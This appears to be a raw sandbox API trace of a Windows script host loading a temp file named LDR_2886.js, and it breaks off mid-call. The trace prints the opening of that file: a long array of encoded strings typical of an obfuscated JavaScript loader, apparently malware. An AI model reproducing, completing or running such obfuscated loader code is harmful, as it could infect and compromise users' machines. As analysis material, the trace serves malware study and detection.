[0045.193] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\LDR_2886.js" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\ldr_2886.js"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000000, hTemplateFile=0x0) returned 0x110 [0045.194] GetFileSize (in: hFile=0x110, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x4b68 [0045.194] CreateFileMappingA (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4b68, lpName=0x0) returned 0x114 [0045.194] MapViewOfFile (hFileMappingObject=0x114, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x120000 [0045.194] GetVersionExA (in: lpVersionInformation=0x25f010*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0xfd343301, dwBuildNumber=0x7fe, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x25f010*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0045.194] IsTextUnicode (in: lpv=0x120000, iSize=19304, lpiResult=0x25f000 | out: lpiResult=0x25f000) returned 0 [0045.194] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x120000, cbMultiByte=19304, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 19304 [0045.194] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x120000, cbMultiByte=19304, lpWideCharStr=0x42f978, cchWideChar=19304 | out: lpWideCharStr="var dogoswoisosfhsdiefgssqda=['wqtowqjClg==','w5Mcwr/DvcOsK2cuBQ==','wrvDpsOqD8KNwpbCjh8pasKgV8Ozb1xZw7jDu8OwwrtSXDnDgMOwa0XCr8OAw69Dw79yA8OW','w5/Cn8KKbMK5HsOefsOg','MErCsEPDhcKacRHCmA==','wozDhsKiwrPDl8KxFAY=','woHDt2ZcPMOsGXtZQcOIwrnDj1lVNsOURHfDgl0kw4tDw4RSw7HCn8Omw5JpXDotC8O7eMKVwpxeYw==','wrDCpsOTwqBiwqfDjELCj27CoETDmHnDnxhqw5fClMKJGsOzwoPCqcOYQm1XW3sBCsOEPcKfZiU7EzrDuMODwp7Cp8OaKMOHw4wDVD5ZfMONfsO/w5c/wq5Ww7jChcOTwrNeIGbDs8KrPVvDqyEjOsKmKDxiwp5aw7jCtgTDuxxXacO3OHJsVk5XwozDvzrCpg==','wqprwqgaw4jCih0=','wofDo8KZwpvDq8KMYn/ConzDt8Kyw6xiQsOIE8OWwrFHPsO3w4PCiEHCk8K3wq7Cn1g=','wozDkcKcwozCmMO4Ew3CojHCnQ==','w7JGw6XCpS4=','w49sw43DuMKR','wrVrwr05w4o=','w4QQwpzCqMK9','wqrDu8OaCsOw','AHliEUE=','UxoSMTA=','UhQDDwg=','cwtkccKr','w79Mw6/DjsKfwqnCi8OTw5FhG8OgFnpkJA==','wowhFljClA==','csO8AMOuZA==','bhADAg==','woTCr8Owwr1N','TErDmMK6wos=','NAbDsMOpNw==','wq7DmsKJw4Z5','wqvCvEbCoks=','w5DDszthPQ==','wrDDgcKlZsKz','wqnDjsKVXcK9','wrrCs8KEDcOY','WcKzfsKnfA==','QTp1VsKB','wqrDicOVbsKL','enXCv8K7','w64uwqc2w4Y=','HnBCBg==','wqYCYQYf','XFbDmMKnwoDCi8Kew6/DpmjCrg==','wo1iUsO9Pw==','w7zDgcOjP8Kt','Rg11bsKR','w5pBwqUBwo8=','O2XCk8O/w6A=','woXCk8OZwrZq','wrvCu8Owwot+','wq5owo0pw64=','ZsOmG8OlTw==','e8OPwq4qMQ==','YhZ3d8Ki','w4BbwpvCt8OY','w7o+woQsw4s=','wojDosO+LcOW','ZH7DvC/DlQ==','c3dOwozChQ==','woVCZsOBPw==','TQxZW8Kn','PRTDssOyFw==','wpcDwpvDmsOo','RlTDuMKywqA=','NsKlecK7w7Q=','YMO/EsOldg==','w55Qw7nDosKj','w5DDmcOseDvDjsKhw4jChX0cVA3DkW/CqMKTw5QLXMOHcMKowrrCux1bwqoBRsKPw79aAGMbw6B4ZTLCrMKKBsKVwq7DglMRK8KRHjTCuMK8w514JxRiwr3DgcKX','wrXClsKBHMOa','wofDu8OVNsOZ','wqXCksOSwoU=','w61Jw6zCsCs=','XMOwOcOz','w6fCq8OoGWE=','LFYlKX0=','wobCgcKOw6ck','w7NpwpfCksOK','GUTCrcOhw7k=','HMOuwqLCn18=','w51Lw7zCoyo=','woZ5TMO8HA==','wqIMDH3Cr8KFQyNUwq8w','w5zDt2Mxwqc=','CMKwDcOTw4w=','I1NBHlA=','w4ljw6XCpzE=','wp8zwqLDkMOy','wqLCh8ONwph/','w7/DmMOLMA==','wqDDnMO6ZcKf','w4V4wp4RwoweF8OtH110dE4=','wp7DoMO6PsOVw5ZJFsOQbMKJCELCow==','DEvCrcOWw6hQwq4jKMOWHwrCqMK+w7J1wqPDhyk=','wpAMI0DCkw==','w7DDuH0rwr8=','OSrDhsOAOcKVQsKIXFXDpsOIwrYRwo0y','wpfCvMOQwotA','wqXCi1rCgm0=','d37CtMK6','F3JpGko=','wpfCnsKzOsO2','Gn9GHWs=','WlXDnsKKwok=','P8OnwrPDp8K6','XQxsS8KX','w4BBw5LDmsKj','LMOVwqvClsOq','wqHChUHCrmc=','dnfCl8KKw4s=','wrzDi8KEw75j','w5ELwpUqw5E=','HGLCv8O5w4M=','O8OCwpfCs0s=','w59uw6rDmMK/','NsOTwonCnms=','OcOrwqvCvV4=','VUHDj8KFwrE=','w6PDssO3KsKg','VcKqXMKseA==','KcOWwpHDq8KJ','wonDtcKkwqlF','wrjCt8KIw5gFIQ==','G8Orwr/DsAE=','w51iwpwgwpw=','wrrDi8KQw75X','U2hiwoPClA==','wovDjsKpwohCQw4=','PVV+A0E=','w75OwpMEwpEG','RQYPLiM=','TUPDoSjDng==','w6nDigxBCw==','wrTCnsK5LMOh','esKJZMKIfA==','wqgkNXTCng==','JMOKw7zCvw==','wrENRAc5','O8OUwpHDpsKa','eXfCuMK8','BznDhcORJw==','QmRawpbCosOIe8KsEXTCow==','UEdxwqTCpQ==','w4xdw4/CpSY=','H8OFwrTDisKc','SMOdwo8SPA==','d8KmRcKYew==','w7ELwoLCj8KIw4F4','G8OZwoTDiTw=','wq7DhcKYwrdc','wpvCgMK2M8OR','wpHDr8Krw5Fh','wqfDl8K7wrTDrg==','YcOhanFu','IcO7w6bChSI=','wqfDoMK0bMKm','wqrChcKCH8O0','w5Zww6DDrsKS','w4TDmMOjEMKg','PDDDhsOQOcKOWMKFCBDDiA==','wqrDnMKkwo7Dn8O0G0nCgW3Dg8ORwq9ISg==','w7TDh8OSMsKR','PSfDscOCHg==','wqXCsE7CsnM=','w5TDkSVzAQ==','PsONwrHDlCg=','MsOKwpzDlMKK','RWYWwpnDvg==','woMbB1bCqQ==','wqbCmsKQw6Ia','wo7DqMKtVMKt','czRabsKB','ADDCiTnDhcOhGn/Diix+woFBwptnaMKKTcOlwo3DgMOEwq1GwobDjMKxw5PDtcOtwoLDlsOgw57DuFUgwrVcwqcJMR7CnmbCnQbDnAhKw7QHwrhuM8Odw68AFcKbOsOB','w5DDt1cuwo8=','W0fDisKn','wobDhMKSwoh5','cVrCm8K+w6A=','w6HDksORKg==','wrfCpVHCjlM=','w7dEw7fCly8=','w6fDrTNQJg==','w6wne8Oiw50=','woJqwokjw50=','wqjClMKNw4gz','Fl3CgljCqw==','woddeMOeMsKJwoHCj8OaNno=','wo0rFljCjQ==','w5FWw6rChig=','wpHDqsK2w4Y=','wqHCs1rCuw==','w6NfwprCsMO1FA==','BsKiMcORw5M=','w4tHw5bCsgw=','w5YwRsOmw6HDicKQw7ZEXcOB','w6UMwp7CjcKZwoQiwo5zdHrDj8KBRsOf','wqEmXCgH','S8O6JMO0aMKow7A1bQLCrg==','w6QTZcO8w7o=','fcKneMK0SA==','woPDj8OdUcKH','w4Ffw6zDn8KB','f0fCl8KIw6E=','w6jCvMOqPXU=','wp3CjMKCw4cN','wrYOcRgw','wpx6wpQ+w5U=','w6nClMO6Ilc=','w7rDgMOvGMKM','wqfDtMKTU8Ky','wrjCkFXCgGfDpMODwprDh8OMwrnDs8KiSgsWwplte8K1woILw4rCs8KbRQ0CwqpeGR1qwrvDv2zCmQnDozBPOcKlU8KDdwZ5V8KzbsKhwrrDtMOQwrlGFsKmw7JSNmF5BsOTLsKMHF9kwoHCmsOzLx3Dg8KsbcKkFcKuNnvCjA==','w43DlsKCHMKLwqDChxo5TcKScsO6fWQ8w47DvcObwr9UT3fDhsOpW0vCvMOLw4Mrw6BAdMOfw4XCiULCsXXDlcOlRsKXLRA2woLDoMOvw47DkMO2w6YIw6DDqsO1w7/DmsKndWATwoU3w4ozwqdLYsOsJ0XCrw==','w51Tw57CqzXDuQ==','WsKDc8KJ','Bz7DhMKND8KfesK+HR7DuMKDw4Fj','w5lhw43Cvg7Dj8OMwoDDjmE7exhkLcKCGcOiwoYwdsKlwonDu8OAwqlWfyXDiWNDeBHDlX4YbMKuFHjCpsKTFMOTwqdCwqJQwpDDpyVmFMKyO8O0w5MQw5oxwqvDj1XDpG/DrcKtw6A5wqvCkUA=','C0PCtErCp8KoZRjCkRAMwpo+w7w8d8KpA8OUw6XCjMKxwrIMwqrCoA==','w7Nowr8AwrI2AsK1FndyT3rDgMOWw68CLcKLF2QawpVtdMOHKFdFCXgLw4fCosO7D3gncsK/ScOow74dw6jCp8KZTcKHw4PCrcKbwqbCp8Oew5M7wrDDhsOaDcO9','OcOlwq3CucO2w5hLw4N0CcO1w4A=','Vn7DjiDDu8Kjw4I9wrRPwr3CrAzCh0I=','w7XDjWwjwrzCoANpAMOlSCgQB8OPBA==','T0gswqrDrcObbRBLLsONwpHCrMOzw41vw6LDnR3CgEJxw4/DgMKbTcOOTMOVw4BEw5TDtcOPSw==','w4BfwrnCgcO7ImweNx7CiMObw6EdeCXDigHCnzU=','wp/Dl8KawrrDm8KzcQ==','bnwjwpPDm8KqD1F+','B8KyGsOh','K8O1wqnDsiTCnMKtwrYTfQ/CpcK8EUbCuBUuw5nCncOlw4PCsmEpwr7CgcKtEQ==','wq7CksKWw50u','wrPDh8O8WMKvEsOESMOFQMKgXXPDqsKEX8KlIsO2NELDu8KvA8Olw6cOL8K6wqDCukkVS8Oswr06Di/CocOmRsO6wptnwoNtAMKzw6lRw5ofPMOHNhJb") returned 19304 [0045.195] UnmapViewOfFile (lpBaseAddress=0x120000) returned 1 [0045.195] CloseHandle (hObject=0x114) returned 1 [0045.195] CloseHandle (hObject=0x110) returned 1 [0045.195] GetSystemDirectoryA (in: lpBuffer=0x25f088, uSize=0x0 | out: lpBuffer="\xcc\xf4\x25") returned 0x14 [0045.195] ??2@YAPEAX_K@Z () returned 0xd74d0 [0045.195] GetSystemDirectoryA (in: lpBuffer=0xd74d0, uSize=0x15 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0045.195] LoadLibraryA (lpLibFileName="C:\\Windows\\system32\\advapi32.dll") returned 0x7fefd710000 [0045.195] ??3@YAXPEAX@Z () returned 0x1dd30701 [0045.195] GetProcAddress (hModule=0x7fefd710000, lpProcName="SaferIdentifyLevel") returned 0x7fefd72e470 [0045.195] GetProcAddress (hModule=0x7fefd710000, lpProcName="SaferComputeTokenFromLevel") returned 0x7fefd72f9b0 [0045.195] GetProcAddress (hModule=0x7fefd710000, lpProcName="SaferCloseLevel") returned 0x7fefd72f660 [0045.196] IdentifyCodeAuthzLevelW () returned 0x1 [0046.264] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x25e200 | out: lpSystemTimeAsFileTime=0x25e200*(dwLowDateTime=0x94e70e70, dwHighDateTime=0x1d543d1)) [0046.264] GetCurrentProcessId () returned 0xb58 [0046.264] GetCurrentThreadId () returned 0xb5c [0046.264] GetTickCount () returned 0x1cd0e [0046.264] QueryPerformanceCounter (in: lpPerformanceCount=0x25e208 | out: lpPerformanceCount=0x25e208*=17068980236) returned 1 [0046.264] malloc (_Size=0x100) returned 0xd7e40 [0046.264] GetVersionExA (in: lpVersionInformation=0x25dfe0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0xe32bf810, dwBuildNumber=0x7fe, dwPlatformId=0xe32b0000, szCSDVersion="\xfe\x07") | out: lpVersionInformation=0x25dfe0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0046.264] GetUserDefaultLCID () returned 0x409 [0046.265] IsFileSupportedName () returned 0x1 [0046.265] _wcsicmp (_String1=".vbs", _String2=".js") returned 12 [0046.265] _wcsicmp (_String1=".vbe", _String2=".js") returned 12 [0046.265] _wcsicmp (_String1=".js", _String2=".js") returned 0 [0046.270] GetSignedDataMsg () returned 0x0 [0046.270] GetCurrentProcess () returned 0xffffffffffffffff [0046.270] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x114, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x25e840, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x25e840*=0x140) returned 1 [0046.270] GetFileSize (in: hFile=0x140, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x4b68 [0046.270] ??2@YAPEAX_K@Z () returned 0xda4f0 [0046.270] SetFilePointer (in: hFile=0x140, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0046.270] ReadFile (in: hFile=0x140, lpBuffer=0xda4f0, nNumberOfBytesToRead=0x4b68, lpNumberOfBytesRead=0x25e820, lpOverlapped=0x0 | out: lpBuffer=0xda4f0*, lpNumberOfBytesRead=0x25e820*=0x4b68, lpOverlapped=0x0) returned 1 [0046.270] CoInitialize (pvReserved=0x0) returned 0x1 [0046.270] CoCreateInstance (in: rclsid=0x7fee32bf850*(Data1=0x6290bd1, Data2=0x48aa, Data3=0x11d2, Data4=([0]=0x84, [1]=0x32, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7fee32bf860*(Data1=0xe4d1c9b0, Data2=0x46e8, Data3=0x11d4, Data4=([0]=0xa2, [1]=0xa6, [2]=0x0, [3]=0x10, [4]=0x4b, [5]=0xd3, [6]=0x50, [7]=0x90)), ppv=0x25e790 | out: ppv=0x25e790*=0xdf4c0) returned 0x0 [0046.417] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x25c990 | out: lpSystemTimeAsFileTime=0x25c990*(dwLowDateTime=0x94f093f0, dwHighDateTime=0x1d543d1)) [0046.417] GetCurrentProcessId () returned 0xb58 [0046.417] GetCurrentThreadId () returned 0xb5c [0046.417] GetTickCount () returned 0x1cd4c [0046.417] QueryPerformanceCounter (in: lpPerformanceCount=0x25c998 | out: lpPerformanceCount=0x25c998*=17084286444) returned 1 [0046.417] malloc (_Size=0x100) returned 0xd7f50 [0046.417] __dllonexit () returned 0x7fee31d14c0 [0046.417] __dllonexit () returned 0x7fee31d14e8 [0046.417] GetVersionExA (in: lpVersionInformation=0x25c770*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x7fe, dwMinorVersion=0xe31d2dc9, dwBuildNumber=0x7fe, dwPlatformId=0xe31d14e8, szCSDVersion="\xfe\x07") | out: lpVersionInformation=0x25c770*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0046.417] GetProcessWindowStation () returned 0x30 [0046.417] GetUserObjectInformationA (in: hObj=0x30, nIndex=1, pvInfo=0x25c758, nLength=0xc, lpnLengthNeeded=0x25c750 | out: pvInfo=0x25c758, lpnLengthNeeded=0x25c750) returned 1 [0046.417] ??2@YAPEAX_K@Z () returned 0xdf060 [0046.417] ??2@YAPEAX_K@Z () returned 0xdf0b0 [0046.417] ??2@YAPEAX_K@Z () returned 0xdf0e0 [0046.417] ??2@YAPEAX_K@Z () returned 0xdf120 [0046.417] ??2@YAPEAX_K@Z () returned 0xdf160 [0046.417] ??2@YAPEAX_K@Z () returned 0xdf1a0 [0046.417] ??2@YAPEAX_K@Z () returned 0xdf1e0 [0046.418] ??2@YAPEAX_K@Z () returned 0xdf220 [0046.418] ??2@YAPEAX_K@Z () returned 0xdf260 [0046.418] ??2@YAPEAX_K@Z () returned 0xdf2a0 [0046.418] ??2@YAPEAX_K@Z () returned 0xdf2e0 [0046.418] ??3@YAXPEAX@Z () returned 0x1dd30701 [0046.418] ??2@YAPEAX_K@Z () returned 0xdf330 [0046.418] ??2@YAPEAX_K@Z () returned 0xdf370 [0046.418] DllGetClassObject (in: rclsid=0x42e400*(Data1=0x6290bd1, Data2=0x48aa, Data3=0x11d2, Data4=([0]=0x84, [1]=0x32, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), riid=0x7fefebb6cd0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x25d460 | out: ppv=0x25d460*=0xdf0b0) returned 0x0 [0046.418] ??2@YAPEAX_K@Z () returned 0xdf0b0 [0046.418] IClassFactory:CreateInstance (in: This=0xdf0b0, pUnkOuter=0x0, riid=0x25e240*(Data1=0xe4d1c9b0, Data2=0x46e8, Data3=0x11d4, Data4=([0]=0xa2, [1]=0xa6, [2]=0x0, [3]=0x10, [4]=0x4b, [5]=0xd3, [6]=0x50, [7]=0x90)), ppvObject=0x25d480 | out: ppvObject=0x25d480*=0xdf4c0) returned 0x0 [0046.418] ??2@YAPEAX_K@Z () returned 0xdf3b0 [0046.418] GetSystemInfo (in: lpSystemInfo=0x25d2c0 | out: lpSystemInfo=0x25d2c0*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7fffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0046.418] VirtualQuery (in: lpAddress=0x25d330, lpBuffer=0x25d2f0, dwLength=0x30 | out: lpBuffer=0x25d2f0*(BaseAddress=0x25d000, AllocationBase=0x160000, AllocationProtect=0x4, __alignment1=0xfffff880, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0046.418] ??2@YAPEAX_K@Z () returned 0xdf3f0 [0046.418] ??2@YAPEAX_K@Z () returned 0xdf410 [0046.418] ??2@YAPEAX_K@Z () returned 0xdf470 [0046.418] ??2@YAPEAX_K@Z () returned 0xdf4a0 [0046.418] ??2@YAPEAX_K@Z () returned 0xdf550 [0046.419] IUnknown:AddRef (This=0xdf4c0) returned 0x2 [0046.419] IUnknown:Release (This=0xdf4c0) returned 0x1 [0046.419] IUnknown:Release (This=0xdf0b0) returned 0x0 [0046.419] ??3@YAXPEAX@Z () returned 0x1dd30701 [0046.419] IUnknown:QueryInterface (in: This=0xdf4c0, riid=0x7fee32bf860*(Data1=0xe4d1c9b0, Data2=0x46e8, Data3=0x11d4, Data4=([0]=0xa2, [1]=0xa6, [2]=0x0, [3]=0x10, [4]=0x4b, [5]=0xd3, [6]=0x50, [7]=0x90)), ppvObject=0x25e6c8 | out: ppvObject=0x25e6c8*=0xdf4c0) returned 0x0 [0046.419] IUnknown:Release (This=0xdf4c0) returned 0x1 [0046.419] _strnicmp (_Str1="